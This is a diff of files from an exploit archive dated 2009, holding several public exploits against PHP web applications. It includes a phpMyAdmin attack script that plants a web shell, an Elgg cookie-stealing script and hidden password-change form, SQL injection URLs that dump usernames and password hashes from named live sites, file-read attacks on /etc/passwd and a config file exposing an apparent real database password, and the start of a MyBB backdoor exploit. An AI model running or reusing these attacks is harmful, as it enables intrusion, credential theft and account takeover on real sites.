+	curl_setopt($ch2, CURLOPT_HEADER, 1);
+	curl_setopt($ch2, CURLOPT_TIMEOUT, 200);
+	curl_setopt($ch2, CURLOPT_URL, $url."config/config.inc.php");
+	$result2 = curl_exec($ch2);
+	curl_close($ch2);
+	//print $url;
+	if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
+		print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
+		print "\n[+] Exploiting, wait sec..\n";
+		$Handlex = FOpen("pmaPWN.log", "a+");
+		FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
+		FWrite($Handlex, "\n[+] Exploiting, wait sec..\n");
+		FClose($Handlex);
+		exploit($url);
+	}
+	else {
+		$Handlex = FOpen("pmaPWN.log", "a+");
+		print "\n[-] Shit! no luck.. not vulnerable\n";
+		FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
+		FClose($Handlex);
+	}
+}
+
+	function exploit($w00t) {
+		$Handlex = FOpen("pmaPWN.log", "a+");
+		$useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox 
+		//first get cookie + token 
+		$curl = curl_init(); 
+		curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php"); //URL 
+		curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
+		curl_setopt($curl, CURLOPT_USERAGENT, $useragent); 
+		curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
+		curl_setopt($curl, CURLOPT_TIMEOUT, 200); 
+		curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); 
+		curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); 		
+		curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string 
+		curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt"); 
+		curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt"); 
+		$result = curl_exec($curl);
+		curl_close($curl);
+		if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches));
+		
+		$token = $matches[1][1];
+		if ($token != '') {
+		print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
+		FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);
+		$payload = "token=".$token."&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
+		print "\n[+] Sending evil payload mwahaha.. \n";
+		FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
+		$curl = curl_init(); 
+		curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php"); 
+		curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
+		curl_setopt($curl, CURLOPT_TIMEOUT, 200);
+		curl_setopt($curl, CURLOPT_USERAGENT, $useragent); 
+		curl_setopt($curl, CURLOPT_REFERER, $w00t); 
+		curl_setopt($curl, CURLOPT_POST, true); 
+		curl_setopt($curl, CURLOPT_POSTFIELDS, $payload); 
+		curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt"); 
+		curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt"); 
+		curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3); 
+		curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); 
+		curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 
+		curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); 
+		$result = curl_exec($curl);
+		curl_close($curl);
+		
+		print "\n[!] w00t! w00t! You should now have shell here";
+		print "\n[+] ".$w00t."config/config.inc.php?c=id \n";
+		print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
+		FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
+		FWrite($Handlex, "\n[+] ".$w00t."config/config.inc.php?c=id \n");
+		
+		}
+		else {
+			print "\n[!] Shit! no luck.. not vulnerable\n";
+			FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
+			return false;
+		}
+		FClose($Handlex);
+		if (file_exists('exploitcookie.txt')) { unlink('exploitcookie.txt'); }
+		//exit();
+	}
+
+?>
+
+# milw0rm.com [2009-06-22]
diff --git a/platforms/php/webapps/8993.txt b/platforms/php/webapps/8993.txt
index 4ff1f16b4..6d1cfffdf 100755
--- a/platforms/php/webapps/8993.txt
+++ b/platforms/php/webapps/8993.txt
@@ -1,107 +1,107 @@
-###################################################################################
-[+] CMS Elgg <1.00 (XSS;CSRF;Cambia Password)Multiple Remote Vulnerabilities
-[+] Discovered By ThE Lorddemon  lorddemon@zonartm.org
-[+] Vendor:http://elgg.org/
-[+] Greetings: Project MEMI-Bolivia, OpTix, RTM security Group http://zonartm.og
-###################################################################################
-	
-Change Password Remotely:
-+++++++++++++++++++++++++
-1) You Must Register In ThE site.
-2) Login
-3) Create a new topic and then edit
-	http://www.sitiosocial.com/_templates/
- 	
-Edit the new topic (Template) have the option to insert HTML, JavaScript
-##################################################################################
-Exploit& HTML Injection
-
-###Cookie Grabber#### 
-[+] Discovered By ThE Lorddemon
-[+] Vendor:http://elgg.org/
-##################################################################################
-PoC
---
-Script to store cookies
- <?php
- $cookie = $_GET['cookie'];
- $log = fopen("log.txt", "a");
- fwrite($log, $cookie ."\n");
- fclose($log);
- ?>
-uploading to a host.Save as cookie.php
-
-[+]Exploit:
-   -------
-1) Register in The SIte
-2) add to the Template
-<script language='Javascript' src='http://localhost/cookie.php?cookie='+document.cooke></script>
-
-The victim would be anyone who comes to your blog.
-
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-###Change Pasword#### 
-[+] Discovered By ThE Lorddemon lorddemon@zonartm.org 
-[+] http://zonartm.org
-[+] Vendor:http://elgg.org/
-#######################################################################################################
-
-1) Register in The SIte
-2) add to the Template
-
-<body onload="document.forms.g.submit();">
-
-<iframe name="my_frame" ALING="BOTTOM"  scrolling=no width=1 heigth=1></iframe>
-
-<form method="POST" target="my_frame" action="http://www.sitiosocial.com/_userdetails/index.php" name="g" id="g">
-<input type=hidden name="name" value="">
-<input type=hidden name="email" value="">
-<input type=hidden name="moderation" value="no">
-<input type=hidden name="publiccoments" value="no">
-<input type=hidden name="receivenotifications" value="no">
-<input type=hidden name="password1" value="password">   <------ Eye with this
-<input type=hidden name="password2" value="password">   <------ Eye with this
-<input type=hidden name="flag[commentwall_access]" value="LOGGED_IN">
-<input type=hidden name="lang" value="">
-<input type=hidden name="flag[sidebarsidebar-profile]" value="yes">
-<input type=hidden name="flag[sidebarsidebar-communities]" value="yes">
-<input type=hidden name="flag[sidebarsidebar-blog]" value="yes">
-<input type=hidden name="flag[sidebarsidebar-friends]" value="yes">
-<input type=hidden name="visualeditor" value="yes">
-<input type=hidden name="action" value="userdetails:update">
-<input type=hidden name="id" value="id_victima">               <---------Eye with this
-<input type=hidden name="profile_id" value="id_victima">       <---------Eye with this
-</form>
-	 	
-It is better to send all the form inside a Div tag to pass unnoticed
-	
-The victim would be the user with the id.
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-###You Be More Popular, or remove the victim to Friends#### 
-[+] Discovered By ThE Lorddemon lorddemon@zonartm.org 
-[+] http://zonartm.org
-[+] Vendor:http://elgg.org/
-#################################################################################################################
-
-1) Register in The SIte
-2) Add to the Template
-
-http://www.sitioSocial.com/mod/friend/index.php?friends_name=[vacio]&action=friend&friend_id=[tu id]
-
-viewing parameters from the viewpoint of the attacker.
-
-Friends_name=is the user name who made you want to be your friend. (may be empty)
-Action= friend or unfriend.
-Friend_id=User ID. who is performing the action
-	
-You can also remove it with friends cuanquier user.
-
-http://www.sitioSocial.com/mod/friend/index.php?friends_name=[vacio]&action=Unfriend&friend_id=[id_victima]
-
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-
-# milw0rm.com [2009-06-22]
+###################################################################################
+[+] CMS Elgg <1.00 (XSS;CSRF;Cambia Password)Multiple Remote Vulnerabilities
+[+] Discovered By ThE Lorddemon  lorddemon@zonartm.org
+[+] Vendor:http://elgg.org/
+[+] Greetings: Project MEMI-Bolivia, OpTix, RTM security Group http://zonartm.og
+###################################################################################
+	
+Change Password Remotely:
++++++++++++++++++++++++++
+1) You Must Register In ThE site.
+2) Login
+3) Create a new topic and then edit
+	http://www.sitiosocial.com/_templates/
+ 	
+Edit the new topic (Template) have the option to insert HTML, JavaScript
+##################################################################################
+Exploit& HTML Injection
+
+###Cookie Grabber#### 
+[+] Discovered By ThE Lorddemon
+[+] Vendor:http://elgg.org/
+##################################################################################
+PoC
+--
+Script to store cookies
+ <?php
+ $cookie = $_GET['cookie'];
+ $log = fopen("log.txt", "a");
+ fwrite($log, $cookie ."\n");
+ fclose($log);
+ ?>
+uploading to a host.Save as cookie.php
+
+[+]Exploit:
+   -------
+1) Register in The SIte
+2) add to the Template
+<script language='Javascript' src='http://localhost/cookie.php?cookie='+document.cooke></script>
+
+The victim would be anyone who comes to your blog.
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+###Change Pasword#### 
+[+] Discovered By ThE Lorddemon lorddemon@zonartm.org 
+[+] http://zonartm.org
+[+] Vendor:http://elgg.org/
+#######################################################################################################
+
+1) Register in The SIte
+2) add to the Template
+
+<body onload="document.forms.g.submit();">
+
+<iframe name="my_frame" ALING="BOTTOM"  scrolling=no width=1 heigth=1></iframe>
+
+<form method="POST" target="my_frame" action="http://www.sitiosocial.com/_userdetails/index.php" name="g" id="g">
+<input type=hidden name="name" value="">
+<input type=hidden name="email" value="">
+<input type=hidden name="moderation" value="no">
+<input type=hidden name="publiccoments" value="no">
+<input type=hidden name="receivenotifications" value="no">
+<input type=hidden name="password1" value="password">   <------ Eye with this
+<input type=hidden name="password2" value="password">   <------ Eye with this
+<input type=hidden name="flag[commentwall_access]" value="LOGGED_IN">
+<input type=hidden name="lang" value="">
+<input type=hidden name="flag[sidebarsidebar-profile]" value="yes">
+<input type=hidden name="flag[sidebarsidebar-communities]" value="yes">
+<input type=hidden name="flag[sidebarsidebar-blog]" value="yes">
+<input type=hidden name="flag[sidebarsidebar-friends]" value="yes">
+<input type=hidden name="visualeditor" value="yes">
+<input type=hidden name="action" value="userdetails:update">
+<input type=hidden name="id" value="id_victima">               <---------Eye with this
+<input type=hidden name="profile_id" value="id_victima">       <---------Eye with this
+</form>
+	 	
+It is better to send all the form inside a Div tag to pass unnoticed
+	
+The victim would be the user with the id.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+###You Be More Popular, or remove the victim to Friends#### 
+[+] Discovered By ThE Lorddemon lorddemon@zonartm.org 
+[+] http://zonartm.org
+[+] Vendor:http://elgg.org/
+#################################################################################################################
+
+1) Register in The SIte
+2) Add to the Template
+
+http://www.sitioSocial.com/mod/friend/index.php?friends_name=[vacio]&action=friend&friend_id=[tu id]
+
+viewing parameters from the viewpoint of the attacker.
+
+Friends_name=is the user name who made you want to be your friend. (may be empty)
+Action= friend or unfriend.
+Friend_id=User ID. who is performing the action
+	
+You can also remove it with friends cuanquier user.
+
+http://www.sitioSocial.com/mod/friend/index.php?friends_name=[vacio]&action=Unfriend&friend_id=[id_victima]
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+# milw0rm.com [2009-06-22]
diff --git a/platforms/php/webapps/8994.txt b/platforms/php/webapps/8994.txt
index 3a5ec1e30..4b31332e5 100755
--- a/platforms/php/webapps/8994.txt
+++ b/platforms/php/webapps/8994.txt
@@ -1,14 +1,14 @@
-#################################################################################################################
-[+] AWScripts.com Gallery Search Engine 1.5 Remote Cookie Insecure
-[+] Discovered By TiGeR-Dz
-#################################################################################################################
-Cookie Insecure
-+++++++++++++++++++++++++
-javascript:document.cookie="awse_logged=1;path=/";
-Demo
-----
-http://www.awscripts.com/demo_se/awse/awse_admin/index.php
-################################################################################################################
-
-
-# milw0rm.com [2009-06-22]
+#################################################################################################################
+[+] AWScripts.com Gallery Search Engine 1.5 Remote Cookie Insecure
+[+] Discovered By TiGeR-Dz
+#################################################################################################################
+Cookie Insecure
++++++++++++++++++++++++++
+javascript:document.cookie="awse_logged=1;path=/";
+Demo
+----
+http://www.awscripts.com/demo_se/awse/awse_admin/index.php
+################################################################################################################
+
+
+# milw0rm.com [2009-06-22]
diff --git a/platforms/php/webapps/8996.txt b/platforms/php/webapps/8996.txt
index 1a81fde18..8581c42d7 100755
--- a/platforms/php/webapps/8996.txt
+++ b/platforms/php/webapps/8996.txt
@@ -1,18 +1,18 @@
-==================================================================
-=========Gravy Media Photo Host 1.0.8 Local File Inclusion========
-==================================================================
-
-Vendor:http://www.gravy-media.com/
-Download:register to download
-Dork:"Powered by Gravy Media"
-Discovered By:Lo$er
-
-====Vulnerable code(forcedownload.php)====
-27. $filename = $_GET['file'];
-
-70. readfile("$filename");
-====Demo====
-
-http://www.gravy-media.com/v108/forcedownload.php?file=%2Fetc%2Fpasswd
-
-# milw0rm.com [2009-06-22]
+==================================================================
+=========Gravy Media Photo Host 1.0.8 Local File Inclusion========
+==================================================================
+
+Vendor:http://www.gravy-media.com/
+Download:register to download
+Dork:"Powered by Gravy Media"
+Discovered By:Lo$er
+
+====Vulnerable code(forcedownload.php)====
+27. $filename = $_GET['file'];
+
+70. readfile("$filename");
+====Demo====
+
+http://www.gravy-media.com/v108/forcedownload.php?file=%2Fetc%2Fpasswd
+
+# milw0rm.com [2009-06-22]
diff --git a/platforms/php/webapps/8997.txt b/platforms/php/webapps/8997.txt
index a082082f9..ebaa0f0c8 100755
--- a/platforms/php/webapps/8997.txt
+++ b/platforms/php/webapps/8997.txt
@@ -1,57 +1,57 @@
-#X      X 
-# X    X       A      K  KK  NN    N  EEEEEE  TTTTTTTT
-#  X  X       A A     K K    N N   N  E          TT  
-#   XX       AAAAA    KK     N  N  N  EEE        TT
-#  X  X     A     A   K K    N   N N  E          TT
-# X    X   A       A  K  KK  N    NN  EEEEEE     TT
-#X      X 
-
-Author: S(r1pt - xaknet.ru
-GreetZ to all users xaknet.ru, especial: baltazar, Saint, X1mer@, Trash, Ic3, G1yuk, NEXGEN, ErrNick, deface and other ..
-
-###
-Kasseler-Cms (Reafile/XSS) Multiple Remote Vulnerabilities
-Site author: kasseler-cms.net
-###
-
-Readfile:
-http://www.kasseler-cms.net/engine.php?do=download&file=../includes/config/configdb.php :
-<?php
-/**********************************************/
-/* Kasseler CMS: Content Management System    */
-/**********************************************/
-/*                                            */
-/* Copyright (c)2007-2009 by Igor Ognichenko  */
-/* http://www.kasseler-cms.net/               */
-/*                                            */
-/**********************************************/
-
-if (!defined('FUNC_FILE')) die('Access is limited');
-
-$database = array(
-    'host'                => 'localhost',
-    'user'                => 'kasseler_robin',
-    'password'            => 'cs010488oia',
-    'name'                => 'kasseler_cms',
-    'prefix'              => 'kasseler',
-    'type'                => 'mysql',
-    'charset'             => 'cp1251',
-    'cache'               => '',
-    'sql_cache_clear'     => 'INSERT,UPDATE,DELETE',
-    'no_cache_tables'     => 'sessions'
-);
-?>
-
-vulnerability in engine.php:
-function download(){
-global $config;      
-    require_once "includes/class/download.php";
-    $file = "uploads/".$_GET['file']; #here =)
-    $download = new file_download($file, 0, 1024);
-    $download->download();
-}
-
-AND XSS bonus:
-http://www.kasseler-cms.net/engine.php?do=redirect&url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnRmluZWQgYnkgUyhyMXB0LCDQsNCz0LAuJyk7PC9zY3JpcHQ+ 
-
-# milw0rm.com [2009-06-22]
+#X      X 
+# X    X       A      K  KK  NN    N  EEEEEE  TTTTTTTT
+#  X  X       A A     K K    N N   N  E          TT  
+#   XX       AAAAA    KK     N  N  N  EEE        TT
+#  X  X     A     A   K K    N   N N  E          TT
+# X    X   A       A  K  KK  N    NN  EEEEEE     TT
+#X      X 
+
+Author: S(r1pt - xaknet.ru
+GreetZ to all users xaknet.ru, especial: baltazar, Saint, X1mer@, Trash, Ic3, G1yuk, NEXGEN, ErrNick, deface and other ..
+
+###
+Kasseler-Cms (Reafile/XSS) Multiple Remote Vulnerabilities
+Site author: kasseler-cms.net
+###
+
+Readfile:
+http://www.kasseler-cms.net/engine.php?do=download&file=../includes/config/configdb.php :
+<?php
+/**********************************************/
+/* Kasseler CMS: Content Management System    */
+/**********************************************/
+/*                                            */
+/* Copyright (c)2007-2009 by Igor Ognichenko  */
+/* http://www.kasseler-cms.net/               */
+/*                                            */
+/**********************************************/
+
+if (!defined('FUNC_FILE')) die('Access is limited');
+
+$database = array(
+    'host'                => 'localhost',
+    'user'                => 'kasseler_robin',
+    'password'            => 'cs010488oia',
+    'name'                => 'kasseler_cms',
+    'prefix'              => 'kasseler',
+    'type'                => 'mysql',
+    'charset'             => 'cp1251',
+    'cache'               => '',
+    'sql_cache_clear'     => 'INSERT,UPDATE,DELETE',
+    'no_cache_tables'     => 'sessions'
+);
+?>
+
+vulnerability in engine.php:
+function download(){
+global $config;      
+    require_once "includes/class/download.php";
+    $file = "uploads/".$_GET['file']; #here =)
+    $download = new file_download($file, 0, 1024);
+    $download->download();
+}
+
+AND XSS bonus:
+http://www.kasseler-cms.net/engine.php?do=redirect&url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnRmluZWQgYnkgUyhyMXB0LCDQsNCz0LAuJyk7PC9zY3JpcHQ+ 
+
+# milw0rm.com [2009-06-22]
diff --git a/platforms/php/webapps/8998.txt b/platforms/php/webapps/8998.txt
index 14a733422..256519e76 100755
--- a/platforms/php/webapps/8998.txt
+++ b/platforms/php/webapps/8998.txt
@@ -1,38 +1,38 @@
-Sourcebans (PHP) (sb-callback.php)
-Author: Mr. Anonymous
-------
-Vendor:http://www.sourcebans.com
-Affected Versions: <= 1.4.2
------
-Exploit (sb-callback lines 185-204):
--------------
-function ChangeEmail($aid, $email)
-{	
-	...SNIP...
-	
-	$GLOBALS['db']->Execute("UPDATE `".DB_PREFIX."_admins` SET `email` =
-'".$email."' WHERE `aid` = '".$aid."'");
-	$objResponse->addScript("ShowBox('E-mail address changed', 'Your
-E-mail address has been changed successfully.', 'green',
-'index.php?p=account', true);");
-	$log = new CSystemLog("m", "E-mail Changed", "E-mail changed for
-admin (".$aid.")");
-	return $objResponse;
-}
--------
-How to Exploit
--------
-No checking is done to verify you own that email address.  You can
-simply submit a post request with the following arguments, to change
-any admins email with your own (or a temporary one), and then reset
-their password, then get full admin access.
-
-You can download firebug for firefox, and simply run in the console
-"xajax_ChangeEmail(ADMIN_ID, EMAIL_TO_CHANGE_TO)", otherwise you need
-to send these variables to index.php via POST:
-
-xxajax: ChangeEmail
-xajaxargs[]: ADMIN_ID
-xajaxargs[]: EMAIL_TO_CHANGE_TO
-
-# milw0rm.com [2009-06-22]
+Sourcebans (PHP) (sb-callback.php)
+Author: Mr. Anonymous
+------
+Vendor:http://www.sourcebans.com
+Affected Versions: <= 1.4.2
+-----
+Exploit (sb-callback lines 185-204):
+-------------
+function ChangeEmail($aid, $email)
+{	
+	...SNIP...
+	
+	$GLOBALS['db']->Execute("UPDATE `".DB_PREFIX."_admins` SET `email` =
+'".$email."' WHERE `aid` = '".$aid."'");
+	$objResponse->addScript("ShowBox('E-mail address changed', 'Your
+E-mail address has been changed successfully.', 'green',
+'index.php?p=account', true);");
+	$log = new CSystemLog("m", "E-mail Changed", "E-mail changed for
+admin (".$aid.")");
+	return $objResponse;
+}
+-------
+How to Exploit
+-------
+No checking is done to verify you own that email address.  You can
+simply submit a post request with the following arguments, to change
+any admins email with your own (or a temporary one), and then reset
+their password, then get full admin access.
+
+You can download firebug for firefox, and simply run in the console
+"xajax_ChangeEmail(ADMIN_ID, EMAIL_TO_CHANGE_TO)", otherwise you need
+to send these variables to index.php via POST:
+
+xxajax: ChangeEmail
+xajaxargs[]: ADMIN_ID
+xajaxargs[]: EMAIL_TO_CHANGE_TO
+
+# milw0rm.com [2009-06-22]
diff --git a/platforms/php/webapps/8999.txt b/platforms/php/webapps/8999.txt
index e5b44f2e4..8efcd3e9f 100755
--- a/platforms/php/webapps/8999.txt
+++ b/platforms/php/webapps/8999.txt
@@ -1,43 +1,43 @@
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-Joomla Component com_tickets (id) SQL-injection Vulnerability
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-
-
-###################################################
-[+] Author        :  Chip D3 Bi0s
-[+] Email         :  chipdebios[alt+64]gmail.com
-[+] Greetz        :  d4n1ux + x_jeshua + eCORE + rayok3nt
-[+] Vulnerability :  SQL injection 
-
-###################################################
-
-Info component:
-Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡
-Name 		: Tickets
-Version		: 0.1 & 2.1
-Author		: Paul Coogan
-Author email	: paul@ideabuzz.com
-Web author 	: http://www.ideabuzz.com
-
-###################################################
-
-Example:
-http://localHost/path/index.php?option=com_tickets&task=form&id=n[SQL code]
-
-n = id valid
-
-
-Demo Live Joomla : version 2.1
-Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡
-http://www.helendaleeducationfoundation.org/index.php?option=com_tickets&task=form&id=1+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users/*
-
-Demo Live Mambo : Version 0.1
-Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡
-http://www.narip.com/index.php?option=com_tickets&task=form&id=68+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mos_users/*
-
-
-+++++++++++++++++++++++++++++++++++++++
-#[!] Produced in South America
-+++++++++++++++++++++++++++++++++++++++
-
-# milw0rm.com [2009-06-22]
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+Joomla Component com_tickets (id) SQL-injection Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+
+###################################################
+[+] Author        :  Chip D3 Bi0s
+[+] Email         :  chipdebios[alt+64]gmail.com
+[+] Greetz        :  d4n1ux + x_jeshua + eCORE + rayok3nt
+[+] Vulnerability :  SQL injection 
+
+###################################################
+
+Info component:
+Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡
+Name 		: Tickets
+Version		: 0.1 & 2.1
+Author		: Paul Coogan
+Author email	: paul@ideabuzz.com
+Web author 	: http://www.ideabuzz.com
+
+###################################################
+
+Example:
+http://localHost/path/index.php?option=com_tickets&task=form&id=n[SQL code]
+
+n = id valid
+
+
+Demo Live Joomla : version 2.1
+Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡
+http://www.helendaleeducationfoundation.org/index.php?option=com_tickets&task=form&id=1+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users/*
+
+Demo Live Mambo : Version 0.1
+Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡Å¡
+http://www.narip.com/index.php?option=com_tickets&task=form&id=68+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mos_users/*
+
+
++++++++++++++++++++++++++++++++++++++++
+#[!] Produced in South America
++++++++++++++++++++++++++++++++++++++++
+
+# milw0rm.com [2009-06-22]
diff --git a/platforms/php/webapps/9000.txt b/platforms/php/webapps/9000.txt
index e4670ecad..fd22adb98 100755
--- a/platforms/php/webapps/9000.txt
+++ b/platforms/php/webapps/9000.txt
@@ -1,28 +1,28 @@
-=======================================================
-+++++++++++++++++++ information +++++++++++++++++++++++
-=======================================================
-[+] Script :RS-CMS 2.1 (rscms_mod_newsview.php key) Remote SQL Injection Vulnerability
-
-[+] Found by : Mr.tro0oqy 
-   
-[+] C0ntact : t.4@windowslive.com <Yemeni ana>
-=======================================================
-+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
-=======================================================
-BUGS
-====
-
-Sql Injections:
-rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users--
-
-DEMO
-====
-http://www.rs-cms.com/rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users--
-
-
-=======================================================
-++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
-=======================================================
-all my Friends
-
-# milw0rm.com [2009-06-22]
+=======================================================
++++++++++++++++++++ information +++++++++++++++++++++++
+=======================================================
+[+] Script :RS-CMS 2.1 (rscms_mod_newsview.php key) Remote SQL Injection Vulnerability
+
+[+] Found by : Mr.tro0oqy 
+   
+[+] C0ntact : t.4@windowslive.com <Yemeni ana>
+=======================================================
++++++++++++++++++++++++ Exploit +++++++++++++++++++++++
+=======================================================
+BUGS
+====
+
+Sql Injections:
+rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users--
+
+DEMO
+====
+http://www.rs-cms.com/rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users--
+
+
+=======================================================
+++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
+=======================================================
+all my Friends
+
+# milw0rm.com [2009-06-22]
diff --git a/platforms/php/webapps/9001.php b/platforms/php/webapps/9001.php
index c14b8f69e..711d5aae6 100755
--- a/platforms/php/webapps/9001.php
+++ b/platforms/php/webapps/9001.php
@@ -1,431 +1,431 @@
-<?PHP
-/*
-
-Someone decided to contact mybb's staff informing about this vulnerability with the obvious result that this will not work anymore. 
-Fucking moron.
-
-I'm releasing a non-finished version of the exploit. No help, PoC and with the necessity of --admindir flag.
-Going to update it in the next days.
-For historical reason, i'm leaving the original title, but note that is <= 1.4.6
-
-
-Example:
-
-paradox@d3b14n:~/Files/Exploit-Pocs/My_Exploit/Remote/Mybb$ php myBBtomilw0rm.php -u anybody -p qwerty -t http://localhost/web/mybb/Upload/ --admindir /admin/
-[.] Initialing.
-[+] Logged in.
-[+] my_post_key variable found.
-[+] Turned On mybb's invisible mode.
-[+] Sql code injected. You're now admin.
-[+] Admindir found (or --admindir is used): /admin/.
-[+] Admin sid Found: 824e26b4221673a0f213c37f87b9ccd7
-[+] Site correctly backdoored.
-[+] Sql code injected. You're now user.
-[+] Backdoor URI: http://localhost/web/mybb/Upload//cache/themes/themes.php
-All Done. The:Paradox hopes you used this exploit exclusively for your own fun and you enjoyed it.
-Have a nice day :P
-
-
-For the curious people: http://mybboard.it/forum/thread-3623.html
-
-*/
-
-/*
-
-Mybb <= 1.4.4 Remote Code Execution through Sql Injection Exploit
-
-
-Discovered: 	About 4 days before the exploit was coded.
-Coded:		03-03-2009 
-Author:		The:Paradox
-Release:	Not yet. 
-
-No php.ini setting can stop us ! =O 
-A user (not email confirmed too) is needed.
-
-Keep private or your keyboard will blew up.
-
-
-*/
-
-
-$mybb = new maibibi2;
-
-
-class maibibi2 
-{
-
-	function __construct ()
-	{
-
-
-
-		$this->user	= $this->get_argv('-u');
-		$this->pass	= $this->get_argv('-p');
-		$this->target	= $this->get_argv('-t');
-		$this->admindir	= $this->get_argv('--admindir');	
-		$this->oa2u	= $this->get_argv('--onlyadmin2user');
-
